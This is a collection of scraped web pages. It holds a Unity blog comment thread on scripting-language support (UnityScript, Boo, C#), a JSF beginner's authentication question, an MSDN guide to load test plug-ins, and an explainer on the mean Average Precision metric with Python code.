def mapk(actual, predicted, k=10):
    # This function computes the mean average precision at k between two lists of lists of items.
    return np.mean([apk(a, p, k) for a, p in zip(actual, predicted)])

!pip install tensorflow==1.15
# Make sure you have a TensorFlow 1.x version for tf.metrics.average_precision_at_k to work

import tensorflow as tf
import numpy as np

y_true = np.array([[2], [1], [0], [3], [0]]).astype(np.int64)
y_true = tf.identity(y_true)

y_pred = np.array([[0.1, 0.2, 0.6, 0.1],
                   [0.8, 0.05, 0.1, 0.05],
                   [0.3, 0.4, 0.1, 0.2],
                   [0.6, 0.25, 0.1, 0.05],
                   [0.1, 0.2, 0.6, 0.1]]).astype(np.float32)
y_pred = tf.identity(y_pred)

m_ap = tf.metrics.average_precision_at_k(y_true, y_pred, 3)

sess = tf.Session()
sess.run(tf.local_variables_initializer())

stream_vars = [i for i in tf.local_variables()]
tf_map = sess.run(m_ap)
print(tf_map)

print(sess.run(stream_vars))

tmp_rank = tf.nn.top_k(y_pred, 3)
print(sess.run(tmp_rank))

import torch
from torchmetrics.detection.mean_ap import MeanAveragePrecision

preds = [
    dict(
        boxes=torch.tensor([[258.0, 41.0, 606.0, 285.0]]),
        scores=torch.tensor([0.536]),
        labels=torch.tensor([0]),
    )
]
target = [
    dict(
        boxes=torch.tensor([[214.0, 41.0, 562.0, 285.0]]),
        labels=torch.tensor([0]),
    )
]

metric = MeanAveragePrecision()
metric.update(preds, target)

from pprint import pprint
pprint(metric.compute())
https://hasty.ai/docs/mp-wiki/metrics/map-mean-average-precision
CC-MAIN-2022-40
refinedweb
1,273
56.15
derelict-cuda 3.1.1

A dynamic binding to the CUDA API.

To use this package, run the following command in your project's root directory:

Manual usage

Put the following dependency into your project's dependencies section:

DerelictCUDA

A dynamic binding to [CUDA][1] for the D Programming Language. Only the Driver and Runtime APIs are provided for now. Please see the pages Building and Linking Derelict and Using Derelict, in the Derelict documentation, for information on how to build DerelictCUDA and load the CUDA library at run time. In the meantime, here's some sample code.

import derelict.cuda;

void main() {
    DerelictCUDADriver.load();
    // Now CUDA Driver API functions can be called.

    // Alternatively:
    DerelictCUDARuntime.load();
    // Now CUDA Runtime API functions can be called.
    // Driver and Runtime API are exclusive.
    ...
}

[1] -

- Registered by ponce
- 3.1.1 released 5 years ago
- DerelictOrg/DerelictCUDA - github.com/DerelictOrg/DerelictCUDA
- License: Boost
- Authors: -
- Dependencies: derelict-util
- Versions: Show all 9 versions
- Short URL: derelict-cuda.dub.pm
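The load() calls above resolve the CUDA shared library at run time rather than at link time. The same run-time-binding pattern can be sketched in Python with ctypes; to keep the sketch runnable without CUDA, it binds against the C library of the current process instead (CDLL(None) works on POSIX; a real CUDA binding would pass the driver library's file name):

```python
import ctypes

# Analogue of DerelictCUDADriver.load(): bind a shared library at run time.
# CDLL(None) opens the running process itself, exposing libc symbols on POSIX.
libc = ctypes.CDLL(None)

# Declare the symbol's signature before calling it.
libc.abs.restype = ctypes.c_int
libc.abs.argtypes = [ctypes.c_int]

print(libc.abs(-5))  # 5
```

As in Derelict, nothing is resolved until load time, so a missing library only fails when you actually try to bind it.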
https://code.dlang.org/packages/derelict-cuda
Parsing with derivatives may be viewed as a form of breadth-first recursive descent. Breadth-first search is orthogonal to depth-first search, and two lines which are orthogonal in two-dimensional Euclidean space may also be said to be perpendicular. Thus, an appropriate name for this library might be "parsper", as a shortening of "parse perpendicular". Such a name is eminently googleable and implies a wealth of potential Star Trek puns. Unfortunately, it looks far too much like a typo. Thus, "parseback" serves both as a faux shortening of "parse backwards" and a reference to "logback", for no particular reason.

Parseback is a Scala implementation of parsing with derivatives (Might, Darais, Spiewak; 2011), taking into account the significant refinements described by Adams, Hollenbeck and Might. It is designed to be an idiomatic, convenient and safe parser combinator library for formal general context-free grammars with production-viable performance.

- Usage
- Motivation
- Performance
- Example
- DSL Reference
- Forks and Releases
- Contributing and Legal

Usage

resolvers += "bintray-djspiewak-maven" at ""

val ParsebackVersion = "0.3"

libraryDependencies += "com.codecommit" %% "parseback-core" % ParsebackVersion

libraryDependencies += "com.codecommit" %% "parseback-cats" % ParsebackVersion
// or!
libraryDependencies += "com.codecommit" %% "parseback-scalaz-72" % ParsebackVersion
// or!
libraryDependencies += "com.codecommit" %% "parseback-scalaz-71" % ParsebackVersion

The current, "stable" version of parseback is 0.3. Cross builds are available for Scala 2.12 and 2.11. All stable, numbered releases are signed with my key. Snapshots are intermittently available. All snapshots are of the form [version]-[hash], where [version] is the compatible base version (i.e. the stable version with which the snapshot is compatible). If that base version is unreleased (i.e. a future release), then full compatibility with the ultimate release is not necessarily guaranteed.
[hash] is a seven character prefix of the Git hash from which the snapshot release was made. Feel free to make snapshots of your own!

Motivation

There are two important things that need to be motivated:

- Generalized parsing
- Parseback as an implementation thereof

If you don't believe that generalized parsing (i.e. a parsing algorithm which can handle the complete space of formal context-free grammars) is necessary, then parseback is a considerably over-complicated solution. It still provides some nice features (many of which are a consequence of generalized parsing!), but there are simpler and faster algorithms which can achieve the goal. That is, if the goal is parsing something less than the full space of context-free grammars.

Generalized Parsing

Context-Free Grammars, or CFGs, have several very nice properties as a formalism. Notably, they:

- Are closed under union
- Are closed under sequence
- Maintain identity under identity transformations

All of these points deserve closer examination. Closure under union and sequence literally says that if you have two CFGs, G and H, then G | H and G ~ H are both also CFGs (using parseback notation). That is, the union of G and H is a CFG (where G and H are CFGs), and the sequentialization (this followed by that) of G and H is also a CFG. We take this property so much for granted when it comes to regular expressions (where it also holds) that it doesn't seem particularly revelatory, but most parsing algorithms do not allow for this. Most parsing algorithms do not accept the full set of context-free grammars. That is, there is a set of CFGs – in the case of some algorithms, a very large and useful set! – which will either be rejected by the parsing algorithm, or which will produce invalid results. Invalid results may range from accepting/rejecting inputs erroneously, to simply crashing on certain inputs.
The subsets of CFGs which are accepted vary from algorithm to algorithm, but some common ones include:

- CNF
- LL(1)
- LL(k)
- LALR(1)
- PEG (not actually a subset of CFG; see below)

Factoring a grammar to fit into the particular rule set accepted by the parsing algorithm at hand can be very non-trivial. Mechanical transformations are possible in many cases, but tooling is seldom available which implements these theoretical algorithms. More often than not, we're stuck reading a BISON "shift/reduce conflict" error, wondering what juggling we need to perform in order to bring things up to par. Identity transformations are the third property which is lost when general CFGs are not accepted by a parsing algorithm. And this is, quite simply, the parsing analogue of referential transparency. For example:

E := '(' E ')'
   | '(' E ']'
   | epsilon

The above is a BNF (Backus–Naur form) grammar which matches strings made up of any number of balanced bracket or parenthesis operators, with the odd twist that brackets may close parentheses. For example:

(((((((((((])))])]])))

is a valid string in the language defined by this grammar. Now, you probably noticed the immediate redundancy across two of the reductions of the E non-terminal. It seems intuitive that we should be able to extract out that redundancy into a separate, shared non-terminal. Always DRY, right?

T ::= '(' E

E := T ')'
   | T ']'
   | epsilon

Unfortunately, this is no longer valid according to some parsing algorithms! We have made a straightforward refactoring to the grammar which, according to the rules of CFG construction, should not have affected the language we match. However, in some algorithms, it would have. This is not an issue for generalized parsers such as parseback. So generalized CFGs, as opposed to the limited variants supported by most parsing algorithms, give us a parsing analogue of referential transparency, and they give us closure under composition.
Again, closure under composition means that we can always compose two grammars, either via union or sequence, and the result is a grammar. Put another way: with a generalized parsing algorithm, all combinators are total; with a non-generalized parsing algorithm, composition is partial and may fail on certain values.

Why Parseback?

So if generalized parsing is so great, why not use one of the more mature implementations? Well, for starters, there aren't too many truly mature generalized parsing implementations. BISON has a "GLR mode", which is depressing and weird because it doesn't actually implement GLR. There are a few well-polished research tools, notably SGLR, which is rather inapproachable for non-research use. To my knowledge (which is far from exhaustive!), there are only two other parser combinator implementations of a cubic time (current best-known bounds) generalized parsing algorithm in any language, and those are gll-combinators and Earley. Earley is a Haskell library, which rules it out if you're on the JVM (for now). gll-combinators is pretty neat, and it's seen production use on several projects over the years, but it has some significant warts. Namely, the algorithm is enormously more complex than PWD (Parsing With Derivatives), which makes maintenance and bug fixing much much harder in practice. Second, the constant-time performance factors are very high. They could be brought down considerably with more optimization work, but private correspondence with other research groups working on GLL suggests that the algorithm itself may simply be inherently less efficient than other generalized parsing algorithms due to the state which has to be threaded through the main dispatch loop. Outside of gll-combinators and research tools like SGLR, there really isn't much that implements generalized parsing. So if you're sold on the idea of total composability and referential transparency, parseback is probably your best bet.
Fortunately, we don't have to point only to this practical monopoly as a reason to use parseback. Other useful features that are implemented or planned to be implemented:

- Scannerless (in practice, scannerless parsing all-but requires generalized CFGs due to eagerness)
- Line tracking (basically required if you're implementing a compiler)
- Disambiguation filters (in the style of SGLR, for declarative precedence/associativity)
- Negation classes (also from SGLR, used for identifiers as distinct from keywords)
- Error recovery (in the style of BISON; open research here)
- Incremental, resource-safe input consumption threaded through an arbitrary monad
- Clean Scala syntax and type inference

Ever wanted to pass an arity-3 lambda as a reduction rule for a Scala parser combinator instance of the form a ~ b ~ c and get full type inference? Scala's parser combinators cannot do this. Parseback can.

Why Not PEG / Packrat / Parser Combinators?

Since the terms are not particularly well known, let's take a second to agree on what "PEG" and "Packrat" are. Parsing Expression Grammars, or PEGs, is a declarative format, analogous to BNF, which defines a grammar-like construct that will be accepted by a recursive-descent style parsing algorithm with infinite backtracking. It consists of two primary composition operators: sequence, and ordered choice. It does not contain a union operation, though ordered choice is somewhat reminiscent of union and may be used to encode similar grammatical semantics. PEGs as a construction and as a parsing algorithm have gained considerable traction over the last decade, due in part to the subjectively intuitive properties of the ordered choice operation for disambiguation (it "tries" the first branch first), and also because of the ease with which the underlying algorithm may be implemented.
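The ordered-choice behavior described above is easy to demonstrate with a toy interpreter. Below is a deliberately minimal Python sketch (not a full PEG engine: no repetition, predicates, or memoization), where a parser is a function from a position to a new position, or None on failure:

```python
# A toy PEG interpreter: parsers are functions (text, pos) -> new_pos or None.
def lit(s):
    def p(text, pos):
        return pos + len(s) if text.startswith(s, pos) else None
    return p

def seq(*ps):
    # Sequence: each element must succeed where the previous one stopped.
    def p(text, pos):
        for q in ps:
            pos = q(text, pos)
            if pos is None:
                return None
        return pos
    return p

def choice(*ps):
    # Ordered choice: commit to the first alternative that succeeds.
    def p(text, pos):
        for q in ps:
            r = q(text, pos)
            if r is not None:
                return r
        return None
    return p

ab_or_a = choice(lit("ab"), lit("a"))
print(ab_or_a("ab", 0))  # 2 ("ab" is tried first and wins)

a_or_ab = choice(lit("a"), lit("ab"))
print(a_or_ab("ab", 0))  # 1 (ordered choice never reconsiders)
```

The last two lines show exactly why ordered choice is not a union: swapping the order of the alternatives changes what is matched, which a CFG union would never do.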
The parsing algorithm itself is exponential in the worst case (a recursively ambiguous grammar applied to input which it will reject), but is generally polynomial (with a moderately high exponent) on most inputs. It does not admit left-recursive grammars, and "ambiguous" grammars will produce only a single result (due to the ordered choice). Packrat parsing improves on PEG parsing through memoization, using a set of techniques very similar to those which are employed within PWD. Packrat parsers are specified by PEGs, with the added benefit of admitting most left-recursive grammars, but not grammars with indirect left-recursion. Packrat parsing is quadratic in the worst case, and generally somewhere between linear and quadratic on most inputs. The memoization is quite tricky to implement, but nothing worse than PWD. Parser combinators are familiar to anyone doing functional programming, and they literally implement PEG parsing. The progression of parser combinator frameworks has more or less mirrored and borrowed-from the progression of PEG parsers, and most widely-used practical parser combinator frameworks are now implemented using some variant of Packrat parsing. This includes Scala's standard library parser combinators. So, if these tools are so popular, why not use them? My answer is simply that PEG parsing, as a fundamental tool, is broken. Ordered choice seems very intuitive and pleasing when you first use it, but it becomes progressively harder and harder to encode expected semantics into a grammar. A very common example of this is encoding equal precedence for the + and - binary operators in an expression grammar. PEG parsing has no really good way of doing this. And as your grammar gets more complicated and your disambiguation semantics become progressively more situational, you end up contorting your PEG expressions quite considerably just to get the ordering you need. 
Your PEG "grammar" starts acting a lot more like an imperative program with slightly odd syntax, rather than a truly declarative abstraction. One of parseback's fundamental guiding principles is that everything about parser construction should be declarative. The grammar should specify the language precisely, and without imperative flow. Disambiguation rules and negation classes should be similarly declarative, and uncluttered from the formal semantics of the CFG itself as they are, in fact, a function of tree construction. Semantic actions (reductions) should be pure functions without a need for separate state tracking. All of these things have been found to be enormously valuable properties in practice (based on experience with tools like SGLR and gll-combinators). Parseback's goal is to bring these properties to Scala together with high performance and a clean, idiomatic API.

Performance

About that performance... Until we measure things, this is all just educated guesswork, loosely informed by the Adams, Hollenbeck, Might paper. And until we finish laying down the fundamental algorithmic work, performance measurements are disingenuous. However, it's not hard to prognosticate what is likely realistic, given what is known about the PWD algorithm, its implementations, and the JVM in general. PWD is a worst-case cubic time algorithm. That means its worst-case asymptotic performance is an order of magnitude worse than Packrat parsing (worst-case quadratic). However, that worst case appears to be quite infrequent in practice. If you're accustomed to analyzing generalized parsing algorithms, it is pedagogically interesting to note that this worst case is not an outgrowth of recursively ambiguous unions, but rather recursively interleaved alternation of sequentials. PWD appears to be somewhat unique in that regard. At any rate, it's not a very common sort of construction in practice.
In practice, PWD's algorithmic complexity should be roughly linear, with some parse trails producing quadratic behavior on subsets of the input. Experiments with various PWD implementations have shown that the inherent constant factors are very low. Adams, Hollenbeck and Might found that the performance of their Racket implementation was within a few factors of BISON on raw C. Even approaching that kind of performance is quite impressive, given the overhead of Racket's runtime. Given that Parseback is being implemented on the JVM, I would expect the performance can be made to be very good. I don't expect to beat BISON, but I do expect we'll be able to see roughly the same tier of performance that the Racket implementation achieved. Or at the very least, I see absolutely no reason why we shouldn't see that tier of performance. The algorithm is very straightforward. The biggest concern is the number of allocations required, which is generally something the JVM doesn't handle as well as other runtimes. Assuming we can achieve the performance that I believe is a realistic ceiling for this algorithm and API on the JVM, parseback should be pretty dramatically faster than Scala's standard library parser combinators. I expect that parseback will remain slower than some heavily-optimized and specialized parsing frameworks such as Parboiled, but such frameworks are designed for a very different use-case (i.e. not language construction). Pre-compiled tools like ANTLR and (especially!) Beaver will remain the gold standard for parser performance on the JVM, but my goal is to bring parseback's runtime performance close enough to these tools that it becomes a real, viable alternative, but (obviously) within the form of an embedded DSL with a pleasant API. 
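As background for the discussion above: PWD generalizes Brzozowski's derivative of regular languages to CFGs. The toy Python sketch below covers only the regular-language core (derive and nullable), with no memoization or laziness, so unlike parseback it cannot handle recursive grammars; it is an illustration of the core idea, not parseback's algorithm:

```python
EMPTY = ('empty',)  # the language matching nothing
EPS = ('eps',)      # the language matching only the empty string

def char(c):   return ('char', c)
def alt(a, b): return ('alt', a, b)   # union
def seq(a, b): return ('seq', a, b)   # sequential composition

def nullable(g):
    # Does the language accept the empty string?
    tag = g[0]
    if tag == 'eps':
        return True
    if tag in ('empty', 'char'):
        return False
    if tag == 'alt':
        return nullable(g[1]) or nullable(g[2])
    return nullable(g[1]) and nullable(g[2])  # seq

def derive(g, c):
    # The language of strings s such that c + s is in g.
    tag = g[0]
    if tag in ('empty', 'eps'):
        return EMPTY
    if tag == 'char':
        return EPS if g[1] == c else EMPTY
    if tag == 'alt':
        return alt(derive(g[1], c), derive(g[2], c))
    # seq: derive the head; if the head is nullable, the tail may also start here.
    d = seq(derive(g[1], c), g[2])
    return alt(d, derive(g[2], c)) if nullable(g[1]) else d

def matches(g, s):
    # Take the derivative once per character, then check nullability.
    for c in s:
        g = derive(g, c)
    return nullable(g)

ab = seq(char('a'), char('b'))
print(matches(ab, 'ab'))  # True
print(matches(ab, 'a'))   # False
```

Extending this to full CFGs is where the memoization, laziness and fixed-point machinery (and hence the careful engineering in parseback) comes in.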
Example

This section will assume the following imports:

import parseback._
import parseback.compat.cats._

If you're using scalaz, you should replace cats with scalaz, as well as make other alterations below to the cats-specific types (e.g. replace Eval with Need). A time-honored example of parsers is the expression grammar, and who are we to argue with tradition! The following parser reads and evaluates simple arithmetic expressions over integers:

Direct Grammar

implicit val W = Whitespace("""\s+"""r)

lazy val expr: Parser[Int] = (
    expr ~ "+" ~ term ^^ { (_, e, _, t) => e + t }
  | expr ~ "-" ~ term ^^ { (_, e, _, t) => e - t }
  | term
)

lazy val term: Parser[Int] = (
    term ~ "*" ~ factor ^^ { (_, e, _, f) => e * f }
  | term ~ "/" ~ factor ^^ { (_, e, _, f) => e / f }
  | factor
)

lazy val factor: Parser[Int] = (
    "(" ~> expr <~ ")"
  | "-" ~ expr ^^ { (_, _, e) => -e }
  | """\d+""".r ^^ { (_, str) => str.toInt }
)

The first thing that you should notice is that this looks very similar to the expression grammar example given on Wikipedia. In fact, the grammar is identical save for three features:

- Negation
- Integer literals
- Precedence and associativity

The Wikipedia article on CFGs actually specifically calls out the precedence and associativity question, whereas we are presciently side-stepping it for the time being. As for negation and integers, it just seemed like a more interesting example if I included them. At any rate, this should give a general feel for how parseback's DSL works that should be familiar to anyone who has used a parser generator tool (such as BISON) in the past. Values of type Parser represent grammar fragments – generally non-terminals – and can be composed either via the ~ operator (sequentially) or via the | operator (alternation). It is idiomatic to vertically align definitions by the | operator, so as to mimic the conventional structure of a BNF grammar. Remember, this is a declarative definition of the underlying grammar.
The first bit of weirdness you should notice as a user of Scala is that all of these parsers are declared as lazy val. This is extremely important. The Scala compiler would not complain if we used def here, but the algorithm wouldn't provide the same guarantees. In fact, if you use def instead of lazy val, the PWD algorithm becomes exponential instead of cubic! This is because def defeats memoization by creating an infinite lazy tree. This is different from lazy val, which represents the cyclic graph directly. Packrat parsing frameworks have a similar restriction. There are a few more symbols to unpack here before we move on to how we actually use this tool. First, the mysterious ^^ operator which apparently takes a lambda as its parameter. This operator is effectively the map operation on Parser. Note that Parser does define a map which obeys the functor laws and which has a slightly different signature. Specifically, it does not provide line tracking (a feature we'll cover in a bit). Symbolic operators, and especially the ^^ operator, have better precedence interactions with the rest of the DSL and are generally quite lightweight, which is why we're using ^^ here instead of an English name in the DSL. The meaning of the ^^ operator is the same as map though: take the Parser to the left and "unpack" it, applying the given function to its result and return a new Parser which will produce the returned value. In standard parser generator terms, ^^ denotes a semantic action, or "reduction". The action itself is given by the lambda which is passed to ^^. This lambda will take the following parameters: - The line(s) which were parsed to produce the results - The first result in a sequential composition - The second result in a sequential composition - etc… Thus, if you apply ^^ to a Parser created from a single rule (such as the very last rule in factor), its lambda will take two parameters: one for the line, and one for the result. 
If you apply ^^ to a Parser created from the composition of two rules (such as the negation rule in factor), it will take three parameters: one for the line, and one for each of the results. If you apply ^^ to a Parser created from the composition of three rules (such as any of the actions in expr or term), it will take four parameters: one for the line, and one for each of the results. In the cases of the expr and term reductions, as well as the negation rule in factor, we don't care about the results from the syntax operators (e.g. "*", "-", and so on), since these are trivial. What we care about are the results from the expr, term and factor parsers. These are captured in the relevant function parameters, and then used in the computation. Sharp-eyed readers will realize that the following grammar production is a bit different than the others: "(" ~> expr <~ ")". Specifically, this is using the ~> and <~ operators. These operators behave exactly the same as the ~ operator – sequential composition of two parsers – except they only preserve the result in the direction of the "arrow". Parentheses are a mixfix operator which only matters for grouping purposes and does not affect the result of the expression. Thus, the result obtained by computing the value of an expression wrapped in parentheses is simply the value of the expression within the parentheses, unmodified. We could have equivalently written this production in the following way:

"(" ~> expr <~ ")"

// is equivalent to!

"(" ~ expr ~ ")" ^^ { (_, _, e, _) => e }

Obviously, the former is quite a bit more concise than the latter. You should decide on a case-by-case basis whether or not it is worth using the ~> or <~ operators in your grammars. For example, you'll notice I didn't use them in the negation operation, despite the fact that the result of the "-" parser is meaningless.
Whether or not you use the "arrow" operators rather than plain-old sequential composition (~) is up to you, but I will say from experience that over-use of these operators can make it very difficult to read a grammar. Sometimes, the simpler tools are best. One final note: that mysterious implicit val W = Whitespace(...) thing that we put at the very top. This is clearly not part of the grammar. What we're actually doing here is configuring the behavior of the scannerless tokenizer within parseback. Parseback does implement scannerless parsing, as you probably inferred from the "bare" regular expression within the factor non-terminal, but doing so requires a bit of configuration in order to avoid assuming things about your language. Specifically, you must tell parseback exactly what characters count as whitespace and thus can be ignored before and after tokens. This is important, since some languages have significant whitespace! By default, parseback will not assume any whitespace semantics at all, and all characters will be parsed. We override this default by providing an implicit value of type Whitespace. This value must be in scope both at the grammar declaration site and at the point where we apply the grammar to an input (see below). Note that parseback's whitespace handling is currently extremely naive. The only whitespace regular expressions which will behave appropriately are of the form c+, where c is any single character class. Thus, \s+ is valid, as is [ \t]+, but //[^\n]*|\s+ is not. We hope to lift this restriction soon, but it requires some work on the algorithm.

Application

So how do we apply a parser to a given input stream, now that we've declared the parser? The first thing we need to do is convert the input stream into a LineStream. LineStream[F] is an abstraction inside parseback representing a lazy cons list of lines, where each tail is produced within an effect, F.
It is very literally StreamT[F, Line], where Line is a String with some metadata (notably including line number). This is a relatively broad abstraction, and allows for basically anything which can be incrementally produced within a monadic effect, including fs2.Stream (or to be more precise, fs2.Pull), IO, Future, or in the case of our simple examples, Eval. LineStream contains some helpful constructors which can build streams from some common inputs, including a plain-old String (which may contain multiple lines). This is the constructor we're going to use in all of our examples:

import cats.Eval

val input: LineStream[Eval] = LineStream[Eval]("1 + 2")

The exact monad doesn't really matter here, so long as it obeys the monad laws. We're constructing a line stream, input, from an already-in-memory value, so there is no need for any sort of complex effect control. In fact, the constructor String => LineStream[F] accepts any Applicative[F], and cats.Eval is just a convenient one. Another convenient applicative might be scalaz.Need. Once we have our input, we can apply our parser to it to produce a result:

val result: Eval[Either[List[ParseError], List[Int]]] = expr(input)

Note that the apply method on Parser requires a Monad[F], where the F comes from the LineStream[F] it was supplied. Naturally, we have to get the result "out" of the monad in order to see it, which is trivial in the case of Eval:

result.value // => Right(List(3))

The results are contained within an Either, and then a List within that. The left side of the Either is how errors can be represented in the case of invalid input, while the right side is where the parsed values are. As this is a generalized parser, it is possible (when you have a globally ambiguous grammar) to produce more than one result for a single input. For example, this might have happened to us if we hadn't factored our grammar to encode precedence. And there you have it! We can apply our parser to any input we like.
For example, we can test that precedence is working correctly:

expr(LineStream[Eval]("3 + 4 * 5")).value // => Right(List(23))
expr(LineStream[Eval]("(3 + 4) * 5")).value // => Right(List(35))

If we hadn't correctly encoded precedence by factoring the grammar (specifically, by splitting expr and term), the first line above would have produced Right(List(23, 35)), reflecting the fact that both interpretations would be permissible. And just as a sanity check, we can verify that things which shouldn't parse, don't:

expr(LineStream[Eval]("3 + *")).value

This will produce the following value (wrapped within Left(List(...))):

UnexpectedCharacter(Line("3 + *", 0, 4), Set("""\d+""", "-", "("))

The Line here contains line number and column offset information indicating the * character, while the Set indicates the possible expected valid tokens which could have appeared at that location. Thus, even though PWD isn't a predictive parsing algorithm, it is still able to give fairly decent error messages. Pretty-printed, this error might look like this:

error:1:5: unexpected character, '*', expected one of: \d+, -, (

3 + *
    ^

So long as you can construct a LineStream[F] for something, and that F has a lawful Monad, you can parse it. For example, here's a simple function that applies a parser to an fs2 Stream of lines:

import fs2._

def parseLines[F[_], A](lines: Stream[F, String], parser: Parser[A]): Stream[F, Either[ParseError, A]] = {
  def mkLines(h: Handle[F, String]): Pull[F, Nothing, LineStream[Pull[F, Nothing, ?]]] =
    h.await1Option map {
      case Some((line, h2)) => LineStream.More(Line(line), mkLines(h2))
      case None => LineStream.Empty()
    }

  lines.pull { h =>
    mkLines(h) flatMap { ls =>
      parser(ls)
    } flatMap {
      case Left(errs) => Pull output (Chunk seq (errs map { Left(_) }))
      case Right(results) => Pull output (Chunk seq (results map { Right(_) }))
    }
  }
}

And there you have generalized, incremental parsing on an ephemeral stream, effectively for free.
We're taking advantage of the fact that fs2 allows us to incrementally traverse a Stream via Pull, which forms a monad in its resource.

Building Trees

Evaluating expressions in-place is all well and good, but parseback's API is really designed for building ASTs for use in larger systems, such as compilers. In order to do this, we're going to need some structure:

sealed trait Expr {
  def loc: List[Line]
}

final case class Mul(loc: List[Line], left: Expr, right: Expr) extends Expr
final case class Div(loc: List[Line], left: Expr, right: Expr) extends Expr
final case class Add(loc: List[Line], left: Expr, right: Expr) extends Expr
final case class Sub(loc: List[Line], left: Expr, right: Expr) extends Expr
final case class Neg(loc: List[Line], inner: Expr) extends Expr
final case class Num(loc: List[Line], value: Int) extends Expr

This is a very straightforward AST that includes line information, just as you might expect inside a simple compiler. We can modify our original grammar to produce this AST, rather than directly evaluating the expressions:

implicit val W = Whitespace("""\s+"""r)

lazy val expr: Parser[Expr] = (
    expr ~ "+" ~ term ^^ { (loc, e, _, t) => Add(loc, e, t) }
  | expr ~ "-" ~ term ^^ { (loc, e, _, t) => Sub(loc, e, t) }
  | term
)

lazy val term: Parser[Expr] = (
    term ~ "*" ~ factor ^^ { (loc, e, _, f) => Mul(loc, e, f) }
  | term ~ "/" ~ factor ^^ { (loc, e, _, f) => Div(loc, e, f) }
  | factor
)

lazy val factor: Parser[Expr] = (
    "(" ~> expr <~ ")"
  | "-" ~ expr ^^ { (loc, _, e) => Neg(loc, e) }
  | """\d+""".r ^^ { (loc, str) => Num(loc, str.toInt) }
)

Now if we apply our parser to a sample input, we should receive an expression tree, rather than a value:

expr(LineStream[Eval]("2 * -3 + 4")).value

Within the "either of lists", this will produce:

Mul(_, Num(_, 2), Add(_, Neg(_, Num(_, 3)), Num(_, 4)))

I've elided the List[Line] values, just to make things more clear, but suffice it to say that they are there, and they represent the line(s) on which
the given construct may be found. This information is very commonly baked into an AST at parse time so that it can be used later in compilation or interpretation to produce error messages relevant to the original declaration site in syntax. Each AST node contains all lines which comprise its syntactic elements, not just the first one, so you have maximal flexibility in how you want to represent things. If all you want is the first line, you're certainly free to call .head on the loc value inside of the parser reductions (the list of lines is always guaranteed to be non-empty).

DSL Reference

- | – Composition of two parsers by union. Both parsers must produce the same type
- ~ – Composition of two parsers by sequence. Both results are retained in a Tuple2 (parseback defines infix ~ as an alias for Tuple2)
- ~> – Composition of two parsers by sequence, discarding the left result
- <~ – Composition of two parsers by sequence, discarding the right result
- ^^ – Map the results of a parser by the specified function, which will be passed the lines consumed by the parser to produce its results
- ^^^ – Map the results of a parser to a single constant value
- "..." – Construct a parser which consumes exactly the given string, producing that string as a result
- """...""".r – Construct a parser which consumes any string which matches the given regular expression, producing the matching string as a result. Regular expressions may not span multiple lines, and beginning-of-line/end-of-line may be matched with the ^ / $ anchors.
- () – Construct a parser which always succeeds, consuming nothing, producing () as a result

Forks and Releases

Fork away! It's Github. Parseback uses a hash-based version scheme for snapshot releases (see the comments in build.sbt for more details), which means that you should feel free to publish snapshot releases to your personal bintray (or other repositories).
The hash-based version prevents Ivy eviction from causing downstream conflicts, and also ensures that any other people pushing that same release will be producing identical artifacts. I have two requests. First, please sign your releases (with the publishSigned SBT command). All releases that I make will be signed with my public key (3587 7FB3 2BAE 5960). Furthermore, any stable release that I make will be tagged and the tagging commit will be signed with the same key. Second, please only push snapshot releases (with versions ending in a git hash or -SNAPSHOT). If multiple people push incompatible 0.3s to different hosts, madness and confusion will ensue in downstream projects. If you need to push a stable release (non-hash/snapshot), please change the group id. That should prevent conflicts while also ensuring that no one is stuck waiting for me to publish a release that fixes their particular bug.

Contributing and Legal

Contributions are very welcome! Issuing a pull request constitutes your agreement to license your contributions under the Apache License 2.0 (see LICENSE.txt). I will not incorporate changes without a pull request. Please don't pull request someone else's work (unless they are explicitly involved in the PR on github). If you create a new file, please be sure to replicate the copyright header from the other files.
https://index.scala-lang.org/djspiewak/parseback/parseback-cats/0.3.0-7aba028?target=_2.12
Here's a bit of eye-candy I whipped up to drop into our product: epAssist. The program has a system tray icon and a context menu comes up when you click on the icon. One problem with tray icons is that it can be easy for users to confuse what the menu for your program looks like. My first solution was to place a disabled menu item with the application name at the top of the menu, but this didn't have the effect I needed. Upon searching my favorite developer site, I found a few menu classes that could act like the Windows Start Menu. I based my menu off these articles and a few others, making as few changes as required to get the effect I needed. The class presented here is by no means original, but I believe that the way the components are put together produces an original and impressive UI component.

The first and easiest use of this class is to place a context menu on the screen. The sample code below shows how to set up and use the simple interface this menu exposes. There are a few shortcomings. First, the menu does not send Command UI messages for enabling/checking menu items. Secondly, messages are sent to the window that owns the menu. If you look at the sample application, you will notice that the view handles ID_APP_EXIT1 and posts ID_APP_EXIT to the MainFrame. If the view handled ID_APP_EXIT and posted it to the frame, standard MFC command routing would have the view intercepting the message first (again!).

#include "GradientMenu.h"

void CGrMenuTestView::OnContextMenu(CWnd* pWnd, CPoint point)
{
    // Set up the colours.. Might want these in program options
    COLORREF rgb1(RGB(0, 0, 0));
    COLORREF rgb2(RGB(128, 128, 255));
    COLORREF rgbText(RGB(255, 255, 255));

    // Create a menu, set the width of gradient
    CGradientMenu oMenu(24, TRUE);
    oMenu.LoadMenu(IDR_POPUP_MENU);

    // Select colours and set the title for the 1st menu
    // sub menus will take the name of the item selected in the parent.
    oMenu.SetGradientColors(rgb1, rgb2, rgbText);
    oMenu.SetTitle((CString)"Test");

    // Show the menu!
    oMenu.TrackPopupMenu(0, point.x, point.y, this);

    // Done!
}

That's it. You need to give the root menu a title, but the sub-menus will get their title from their parent. For the main program menu, I simply faked it out. The main menu has no popups, but handles the WM_COMMAND and puts a popup under the menu item. See the sample for full details.
http://www.codeproject.com/Articles/505/Gradient-Menus-in-MFC?msg=4154
Jaime Rodriguez

On Windows Store apps, Windows Phone, HTML and XAML!!

Last week, the WPF test team released a new version of their Test API: 0.2. You can download the new release from their codeplex site. The Test API is a library with utilities for testing WPF and Windows Forms applications. The best way to learn about the lib is to download it, play with it and read their docs; that said, if you want to learn more before you download, Ivo the WPF test manager has some good blog posts on their 0.1 release. For feedback, you can go to the codeplex forums. They need help prioritizing the features in the next version. Among the most interesting ones, I see controls verification, state management APIs, property comparisons, performance, and leak detection. I am voting for the last two!! How bout u?

You know the drill... raw, unedited, yet deep and useful WPF conversations!!

Subject: Changing Resources from Triggers

I have a complex ControlTemplate that I want to change colors when the mouse is over it. The colors are used at various places deep within the template, and some are even in nested templates...

Answer: To change Resources on a Trigger is to change a non-DP property on a Trigger. WPF does not currently support this. As a workaround, could you try the following pattern?
<ControlTemplate>
  <SomeElement1 x:Name="element1">
    <SomeElement1.Style>
      <Style>
        <Style.Resources>
          <SomeResource1 x:Key="blah" />
